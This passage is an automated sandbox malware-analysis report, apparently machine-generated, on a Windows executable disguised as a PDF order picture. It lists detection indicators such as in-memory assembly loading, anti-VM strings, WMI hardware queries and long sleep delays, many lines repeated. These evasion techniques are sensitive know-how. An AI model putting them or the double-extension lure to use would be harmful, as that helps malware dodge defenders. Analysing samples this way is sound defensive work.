                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.13.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 0_2_00DF92F5 push ds; ret
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 0_2_00DF9347 push ds; ret
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 0_2_00DF9361 push ds; retf
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 3_2_003E9361 push ds; retf
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 3_2_003E9347 push ds; ret
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 3_2_003E92F5 push ds; ret
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_008C92F5 push ds; ret
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_008C9347 push ds; ret
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_008C9361 push ds; retf
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.8848412694
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.31c735c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 7084, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7040Thread sleep count: 1168 > 30
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239872s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7040Thread sleep count: 2873 > 30
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239761s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7076Thread sleep time: -35197s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239656s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239546s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239438s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239297s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239187s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239047s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238907s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238781s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238672s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238547s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238437s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238328s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238219s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -237797s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -237500s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -237391s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -237250s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -237141s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -236954s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -236594s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -236094s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -235204s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -235078s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -234953s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7064Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7040Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 4624Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7044Thread sleep count: 890 > 30
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7044Thread sleep count: 8962 > 30
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 240000
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239872
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239761
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239656
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239546
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239438
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239297
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239187
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239047
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238907
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238781
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238672
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238547
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238437
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238328
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 238219
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237797
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237500
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237391
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237250
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 237141
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 236954
